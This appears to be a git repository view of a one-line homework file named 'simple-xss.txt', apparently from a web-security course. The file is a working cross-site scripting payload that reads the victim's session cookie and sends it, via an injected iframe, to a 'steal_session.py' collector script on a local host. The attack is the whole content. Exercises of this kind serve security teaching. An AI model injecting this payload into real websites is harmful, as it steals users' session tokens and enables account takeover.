summaryrefslogblamecommitdiff
path: root/hw4/simple-xss.txt
blob: 1862081d90d9cac931b015f8250e71043bfafe9a (plain) (tree)
1
                                                                                                                                                                                                                
<script> var tmp = '<iframe src="http://127.0.0.1:8000/cgi-bin/steal_session.py?session=' + document.cookie.split('=')[1] + '" frameBorder="0" width="1000" height="90"></iframe>'; document.write(tmp)</script>